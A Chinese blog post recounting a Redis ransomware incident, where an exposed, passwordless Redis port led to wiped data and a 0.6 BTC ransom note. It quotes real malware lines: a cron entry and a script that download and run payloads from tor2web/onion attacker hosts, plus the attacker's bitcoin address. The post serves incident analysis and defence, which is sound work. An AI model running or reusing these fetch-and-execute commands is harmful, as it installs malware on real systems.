又一次redis被删库跑路,索要0.6比特币

还在和媳妇儿逛街,突然同事打来电话说redis库被清空。

于是,媳妇儿说你真是乌鸦嘴,早上还说redis如何被提权的事情。

怎么刚出来就碰上了?

会不会是你搞的?

于是无形中又背锅了。

见×××姐如此着急,边安慰,边提醒让同事查一下,是什么时候发生的事情,受害面积有多大?

但是×××姐很镇静的说,不可以啊,我们ucloud云商上的redis的机器,是禁止外网登录的,
所有外网的6379端口都被禁用了。

仅限本机登录,于是,我问你有加密码嘛?×××姐说,便于程序研发效率,内网环境,自然就没有加密码。

于是,匆匆忙忙赶回去,登录上机器,通过uclod控制台确认看了下。

我擦被那个蠢货开启了一台机器的redis外网,而这台机器,
××××××面除了一个监控调度的程序,是和其他机器完全隔离的,
没有任何业务直接关联的程序,除了redis,而且这台机器也不能连接到其他机器的redis。

这台机器没有任何机密核心数据。

结果登陆上机器就出现了

Warning!
Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.6 BTC to our BitCoin Address and Contact us by eMail with your server IP Address and a Proof of Payment. Any eMail without your server IP Address and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome!
!
Mail:[email protected]
Bi
BitCoin:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny

遇上此事,别慌张,显然是没有备份你数据的,给了钱也不会有数据。

倒也是有人给付款,详细查看下面阿里云官方文章。

科普一下:
比特币单价,写此文时,价格是1BTC=44871.5元

正式走起....

习惯性的先crotab -l,看了下,因为怕其他命令被篡改。

54 * * * * (wget -qO- -U- U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh||wg||wget -qO- -U- U- http://ddgsdk6oou6znsdn.tor2web.me/i.sh||wg||wget -qO- -U- U- https://ddgsdk6oou6znsdn.onion.pet/i.sh||wg||wget -qO- -U- U- https://ddgsdk6oou6znsdn.onion.ws/i.sh)|bas|bash
一看高明了,直接使用了暗网地址。

自己也尝试用了洋葱路由经过各种设置到了暗网去访问,发现访问不了。
于是google了一下可谓是怨声载道。



声明:需要在能访问谷歌的前提下,点击以下链接。

原文地址

看不懂英文点击这里

原来坑不止这一个,于是想起以前的hadoop yarn的悲情故事。
查看到了阿里云先知社区的文章,如此熟悉又那么陌生。

紧接着确认了机器受害的情况,发现是在周六3点左右,

谁TM这时候搞,具有混淆性,乃至怀疑到了是不是内鬼所为,登录机器一查。

被清redis库的机器上所有2018年11月3号的日志,last信息,以及你能脑补到的,都被删除了。

唯独和唯一一台被开启外网redis端口机器不同的是:

"这些被清redis库机器的root home data目录下属于的数据都在,也并没有warning.txt."

毁坏程度可以查看阿里云官网脚本(虽然我们任务计划里显示的脚本只能下载下面这么一个)

内容如下:

exec &>/dev/null
if ! ps -p $(< /tmp/.X11-lock); then
    x=/var/tmp/.x
    wget -qU- http://malwregafeg2fdjn.tor2web.me/.$(uname -m) -O$x;chmod 777 $x;$x;rm -f $x
fi

删库跑路加勒索,Redis勒索事件爆发

但参考上面文档以及直接受损害的机器,明显就是root,home,data目录都被删。

脚本丝毫没体现出备份到他们数据库的意思。

看下人家10秒之内就可以抵挡,你垃圾Ucloud,并没有动静.
可谓是大厂和小厂的天壤之别。

来不及悲伤与埋怨,媳妇儿也明知道重要数据都是已转移。

接下来的事情,就是确认其他redis机器,受害面。

以及弥补方法。

据同事说删除了5台机器的数据估计直接是flushdb all.

唯独不一样的是,被清库的所有redis机器上面的文件目录都在,
而且也没有任何可疑的进程,更没有任务计划。

如果是***远程操作清除日志,奈何非要选择z只清除清库当天的日记。以及清除当天登录消息。甚至如此了解。让人不得不防是不是内鬼行为?

在数据有挽回希望的同时,小媳妇儿心理由于没有好好逛街,而超级不爽。

人漂亮,技术也好,人缘自然不差的她,甚是憋屈。

虽然每一个离职人的权限都收回了,然而被一台没有在乎的机器,被不知名的人从中作梗,害人害己,显然让人为之怀疑这些搞破坏处心积虑的人之目的。

由于害怕被APT,查遍了所有机器,以及所有的秘钥认证。

于是,笔者推荐用jumpserver一定要严格的把控好权限,就算你删了日志又何妨,有本事你来删除我的跳转机日志。

毕竟权限大到好几个人都有登录嫌疑。又不好定位。

出事了开发人员大多都只管我现在不能用了,至于发生了什么,大抵谁都不会搭理。

而在这件事情中,自己的感觉是每一个思维模式从安全的角度出发。而媳妇儿作为大数据运维,是从运维的角度出发。

因此还是出现了分歧,比如她就会认为是内鬼所有,当然这个几率很大,他会从当下时间去分析,然而在安全方向有一个最可怕的,那就是APT。

我不急于一时搞你,我就埋藏在这里,用上长时间去抓包,分析你业务,***你机器,毕竟敌人在暗处,你在明处。

如果是内鬼,又何必写别人的比特币地址。因此种种作案手法,还是充满嫌疑。

能做的就是换跳板机,做好最小授权。最后我提议上蜜罐。

管理实际上最难的一件事,无论是管人还是技术,随便一个冷区,容易忽视的冷区,都可能成为歹徒兴风作浪的切入点。

而做一个技术人,术业有专攻,哪怕你再聪明,永远做不到绝对的安全。

还记得初入职场,清华大学的CTO给在下的一句话,知道你自己肩上的担子多重吗?

我的回答是知道:因为我是有root权限的人......

原文地址:http://blog.51cto.com/hashlinux/2313323

时间: 2024-11-09 03:37:41

又一次redis被删库跑路,索要0.6比特币的相关文章

Oracle删库跑路

--10g R2 startup mount exclusive restrict; alter system enable restricted session; drop database; --11g startup mount exclusive; alter system enable restricted session; drop database; --RAC 12.1.0.2.0删库 1.先停止所有节点实例 2.在其中一节点操作,先关闭rac模式 startup nomount

P5270 无论怎样神树大人都会删库跑路

题目地址:P5270 无论怎样神树大人都会删库跑路 暴力模拟都会吧...... 50分代码: #include <bits/stdc++.h> using namespace std; const int N = 1e5 + 6; int n, T, Q, m, c[N], r[N], mx, cnt, d[N], ans, s[N], now; vector<int> e[N]; queue<int> q; int main() { cin >> n &g

“删库跑路”这件事情真的发生了 ,还是技术总监干的!

程序员经常相互开玩笑说,大不了我们"删库跑路",这是一句玩笑话,基本上也没有人这样干,但是这两天我看到了一个新闻,真有人这样干了,还是一名技术总监. 事情的经过大概是这样子的: 邱某是某某科技公司的技术总监,2014年入职到杭州的一家科技公司,这家公司的主业业务是提供 SaaS 服务. 从2014年入职到2018年,公司的主要系统都由他搭建,包括公司的SAAS系统.API系统.电子合同的签署等服务,2018年初公司大概有4万多用户. 不知道由于什么样的原因,2018年4月,老板宓某某找

删库跑路的背后,是企业对数据安全的反思

这几天,一直在关注微盟删库事件的进展,在3月1日晚上,微盟发布最新公告称数据已经全面找回.而此时,距离事故发生的2月23日晚,过了有足足七天七夜,也就是7*24小时. 01  关于“删库跑路"的段子一直都在,而这样的真实事件也不是第一次发生了. 2018年6月,某科技公司总监因为被离职而一气之下删除了公司数据库上的一些关键索引和部分表格.虽然他事后察觉后果严重,进行了恢复,但依然给该公司造成了经济损失,被判处有期徒刑二年六个月,缓刑三年. 2018年9月,顺丰出现过一位高级工程师因手误删除了线上

程序员如何彻底地删库跑路

原文:程序员如何彻底地删库跑路 删除是删除数据最便捷的方法,如 Linux 用户最经常采用rm删除命令.实际上并没有真正的将数据从硬盘上删除,只是将文件的索引删除而已,让操作系统和使用者认为文件已经删除,又可以把腾出空间存储新的数据.数据恢复极易恢复此类不见的数据,而且也有很多专门进行数据恢复的软件. 彻底删除的原理:磁盘可以重复使用,前面的数据被后面的数据覆盖后,前面的数据被还原的可能性就大大降低了,随着被覆盖次数的增多,能够被还原的可能性就趋于 0,但相应的时间支出也就越多. 覆盖原理(ov

记一次差点删库跑路的事故

故事这样发生的,那是一个中午.... 老板:小a呀,咱测试项目部署在百度云服务器上,测试数据库部署在阿里云上,为了节省点流量,你把阿里云上的测试数据库迁移到百度云上吧. 小a : 好的,老板. 小a登陆测试服务器一看,咦?竟然有mysql的服务在跑,试着登陆了一下,密码不对,于是他仔细想了想,好像并没有任何项目用到这个数据库,这...是什么情况,难道是centos自带的吗 于是小a去问了度娘,还真的有centos自带mysql这一说,为了减少数据库版本不一致可能会导致的麻烦,小a果断卸载了原本的

史上最全mysql删库跑路必会姿势

基础篇:MySql架构与存储引擎 逻辑架构图: 连接层: mysql启动后(可以把mysql类比为一个后台的服务器),等待客户端请求,当请求到来后,mysql建立一个一个线程处理(线程池则分配一个空线程,当然也可使用nio线程模型.),每个线程独立,拥有独自内存空间.当请求为select请求则没有关系,但是请求为update时,多线程同时修改一块内存,就会引发一系列问题,由此引出 "锁"的概念. 查看mysql当前连接数: show VARIABLES like '%max_conne

删库跑路计划图鉴

原文地址:http://blog.51cto.com/14037419/2307755

当删库时如何避免跑路

延时节点解决方案 删库跑路也是个老梗了,可见在运维数据库的过程中误删除数据,或者开发的代码有bug,造成数据的误删除屡见不鲜.不过现在也有许多用于恢复或预防误删除的方案,例如SQL管理系统,将要执行的SQL先交由管理员审核,然后由管理员备份一个镜像数据库,在镜像上执行该SQL,并在执行后还原镜像.这样经过层层把关就可以大大减小出现误操作的几率. 另外,利用binlog日志也可以恢复误操作的数据,所以线上运行的数据库都会开启binlog日志功能.还有就是本小节要介绍的延时节点:在Replicati